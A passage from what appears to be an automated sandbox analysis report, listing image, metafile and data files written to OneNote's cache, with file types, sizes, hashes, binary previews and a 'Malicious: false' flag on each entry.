Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ............+............+.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............0unb..(.1.\|...kz....N...^.................z..F<M..e..K..........f........................................I.qk..B.....LZ............0unb..(.1.\|...kz........0unb..(.1.\|...kz................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4.....7..7........................;........4...4...4....................#.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	34299
Entropy (8bit):	7.247541176493898
Encrypted:	false
SSDEEP:	768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
MD5:	E9C52A7381075E4EBC59296F96C79399
SHA1:	BE295AD24D46E2420D7163642B658BF3234A27EA
SHA-256:	D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
SHA-512:	95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q\|..'.;\..6..v......e...../.k..\|.8..i..\|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.\|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L\|.'5...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.295005425767137
Encrypted:	false
SSDEEP:	48:Bgsgls20aH1VHUztIM9vtMEHSFLCcXI3c9RVjoxrdqr6BRXQbp3C1Gsu+RS9tB:OsC0zzFMEyFzXIM9HjwRyOylEQt
MD5:	F4F561E087BFAD2FDE0434FCEC020296
SHA1:	21022B795A348751F3C11AA1C8C841EEC64CAD50
SHA-256:	68AF73F15C93A06C26EE94B14F2A3B7AAA33F6E908FA5439A37A112DC41D092D
SHA-512:	A38A4B1A384ACD1885307E6E1226E8AA505EECC59681E06AB345B37CAF5BD0958715B3F33B5F58EF43BCAE46C281B20DAEB987DC65363EC11F71ED36E481AFB2
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ>yU.....>yU.l........U.>yU.l........U.>yU..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............N..?(_..u.P......N...^................ .I..TB.1.I...m........f........................................I.qk..B.....LZ.............N..?(_..u.P...........N..?(_..u.P...........>yU.....>yU.....>yU.........................................>yUj....>yUT.]..>yU.....>yU..B..>yUH....>yU..B..>yU..>.)>yU..J...................;........4...4...4.."..............>yU.>yU.>yU..z...y.. x.. ...........$........4.....7*..7........................;........4...4...4.........>yU.....>yU....#>yU............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 552, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	10056
Entropy (8bit):	7.956064700093514
Encrypted:	false
SSDEEP:	192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
MD5:	E1B57A8851177DD25DC05B50B904656A
SHA1:	96D2E31A325322F2720722973814D2CAED23D546
SHA-256:	2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
SHA-512:	BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
Malicious:	false
Preview:	.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.336643876067841
Encrypted:	false
SSDEEP:	48:+mNIs8vlGMipx3/pOLxt0mKNDSPvEXh2aL7XwWn9DYoBrdqrQ7qUEvRX3D/5xkBu:bNIsPxhOLxSmKOEfHXwm9DYARyQsvYW
MD5:	526DFFD94F7F1CA8C2EC85EF1B232E37
SHA1:	B9E5BE29F9C85A64FA4BFD5283EED1447AD4A8AD
SHA-256:	6E00BE21010AA99A17CE0983EF018BC448F189C50BED6579A379B796D92A2826
SHA-512:	FFEFA033E6347D76CCB091CA7C6850316028B7FF47DB8A2C1E314D083718C4F11C4311AC71685E049ED0CBEFE5997E08F77C30A1064256C50397C153EC5052E6
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v............................I.......I.qk..B.....LZ...........t].W..G .1.yA...t].W..G .1.yA.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................".G.......k....N...^.................].\|.O.07rgXB.........f........................................I.qk..B.....LZ...............".G.......k...........".G.......k........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7*..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006O.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
Category:	dropped
Size (bytes):	84097
Entropy (8bit):	7.78862495530604
Encrypted:	false
SSDEEP:	1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
MD5:	37EED97290E8ECB46A576C84F0810568
SHA1:	18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
SHA-256:	140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
SHA-512:	E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
Malicious:	false
Preview:	......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006P.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.297895749486982
Encrypted:	false
SSDEEP:	48:nsHm87Wzgt71z/EMx0xIXShXxI9zEoe+rdqrJITRXBxz8J/L1:nsH+zgR9EvIXSTI9zEp+RycS
MD5:	D0ABD518A19FD6E811F8599C4711158C
SHA1:	89765FA0A79B2D398DE2C5CC132FF9454ED19D00
SHA-256:	78D8704350432465850531BD28761774F7BC754CD06680E9AF3310597415C28B
SHA-512:	59C5930029E3F942AE6D5D89200FEB398274E938CBCC5FD32EB32A8404AE0729D2AF31A4784CD85E58E51CE2B7C718649A194BC1BE9004E7545135B182082C8A
Malicious:	false
Preview:	2...>.......L...v...@...................................................................................................................................2...>...(.......v...t............................I.......I.qk..B.....LZ........pX..!7....i>..pX..!7....i>...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.................9...?$..........N...^.................."...M.....xl........f........................................I.qk..B.....LZ................9...?$..................9...?$......................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4.....7..7........................;........4...4...4....................#.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006Q.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
Category:	dropped
Size (bytes):	64118
Entropy (8bit):	7.742974333356952
Encrypted:	false
SSDEEP:	1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
MD5:	864EEA0336F8628AE4A1ED46D4406807
SHA1:	CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
SHA-256:	7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
SHA-512:	0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006R.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3170514881264745
Encrypted:	false
SSDEEP:	48:J8BswJsw+HiWxUtRrxXEphXOwx9gQz6oNrdqrvC58RX1p7ZZXnJ:GBsM2LxUlEHXD9/z68RyvxpX
MD5:	7039906CF7A78BCBA5227D2CD70DC93F
SHA1:	CF25FF51AFAC22681D38F17E065D71DD11C99BCF
SHA-256:	FE2D7E72370D11561543E7F164EC7B2192A225AD59AD66FDC71574A925B4375B
SHA-512:	5492531B971FC24D1AC05AF4BB2D8F8A6245EA96C47B9D1EA8DA25D9C48E477152FEF5D794D9AFAD99E365D9E49966F66DA48BC5585D29C4CC3DB10478ED0057
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>..........v...v........................................^Y.>C\|.....I.......I.qk..B.....LZ.....^Y.>C\|.........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................:..........N...^...............u.>\|B.{F.xd.Nd.........f........................................I.qk..B.....LZ....................:......................:..............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4.....7..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006S.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
Category:	dropped
Size (bytes):	65998
Entropy (8bit):	7.671031449942883
Encrypted:	false
SSDEEP:	1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
MD5:	B4F0A040890EE6F61EF8D9E094893C9C
SHA1:	303BCBA1D777B03BFD99CC01A48E0BB493C93E04
SHA-256:	1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
SHA-512:	8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006T.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.2673656279404355
Encrypted:	false
SSDEEP:	96:CsOB+2FylDN+WEc4q7X4Pm9Xtxq6OuKR0Pq/259d:Csu+24lDscxX4Pm9XtTO1R02259
MD5:	5DAC1DB4BB13F53E8094CA3E8AA8BD8B
SHA1:	50D1EA639BD12E15A4E819841234FE56BC0F8446
SHA-256:	8B64D28B7654A5514DE7DD22B0B9219E569E6F28E51CC22D263126EA7A94C383
SHA-512:	763276A79B6F5005647925602DEF6EB9403E54296779342D4F85BFCB4D38FFF496C488E6270BA18309A7CC15F5A3E57B0895DBC73E97201BAD228C27089A5A30
Malicious:	false
Preview:	2...>...........v.......................................................................................................................................2...>...j.......v................................I.......I.qk..B.....LZ.^.......^.d.A..<AZ.-.$..^.d.A..<AZ.-.$..^...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............$...O...5.9u....N...^...............~...G..A......I.........&...................................>....I.qk..B.....LZ..............$...O...5.9u..........$...O...5.9u..........^.......^.......^...........................................^.j.....^.T.a...^.......^...D...^.H.....^...N...^...?.#.^...9...................;........4...4...4.."...............^...^...^...z...y.. x.. ...........$........4.....7*..7...........Op.b..F.$..i.................;........4...4...4..........^.......^.....#.^.............................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006U.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000006V.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000070.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000071.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000072.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	32656
Entropy (8bit):	3.9517299510231485
Encrypted:	false
SSDEEP:	384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
MD5:	DD4CA4BC0A73FCB71BEBAA3C29CB8F66
SHA1:	1A7085771D7941540EC94A1BD24D7CC8EA556D4B
SHA-256:	0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
SHA-512:	5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
Malicious:	false
Preview:	....l...r...1......^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+@..$..........?...........?.........@.......................}E

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000073.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12824
Entropy (8bit):	7.974776104184905
Encrypted:	false
SSDEEP:	384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
MD5:	2628353534C5AD86CBFE57B6616D46DD
SHA1:	244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
SHA-256:	69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
SHA-512:	2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
Malicious:	false
Preview:	.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.\|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a\|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[\|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......\|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.\|. ......EC..............1.\

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000074.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.3335726069341165
Encrypted:	false
SSDEEP:	48:Yu+s78pl5MMtO9y86Eya7+X4y39X2xjd8Srd3rlx9qB7RXW1nZZ:YRs4MMk9yPEyaiX4y39X2x6SRb1qty
MD5:	D9A7E74AFD4705071894ECB543F6C088
SHA1:	127CB641C53DBFE8497FA19E87DF14B58AAA7231
SHA-256:	871238C7741F968E9D152A5469F6C0A8063F9EDFBDD447C8B88E2F16860DD7BB
SHA-512:	3BA485E77DAE10B7371C6905A84931D35FDADF229B70F93E983B3B32853FE85B2E59307ABC6D69934D9E78A7E0CCEF3B8A80C990C617879D6CB55815CF2C63A6
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZXJ......XJ...C?.>.A.C...XJ...C?.>.A.C...XJ...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............,.+...2m..(..>....N...^...................A.=A.}............f........................................I.qk..B.....LZ.............,.+...2m..(..>.........,.+...2m..(..>.........XJ......XJ......XJ..........................................XJ.j....XJ.T.]..XJ......XJ...B..XJ.H....XJ...B..XJ...>.)XJ...J...................;........4...4...4.."..............XJ..XJ..XJ...z...y.. x.. ...........$........4.....7..7........................;........4...4...4.........XJ......XJ.....#XJ.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000075.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
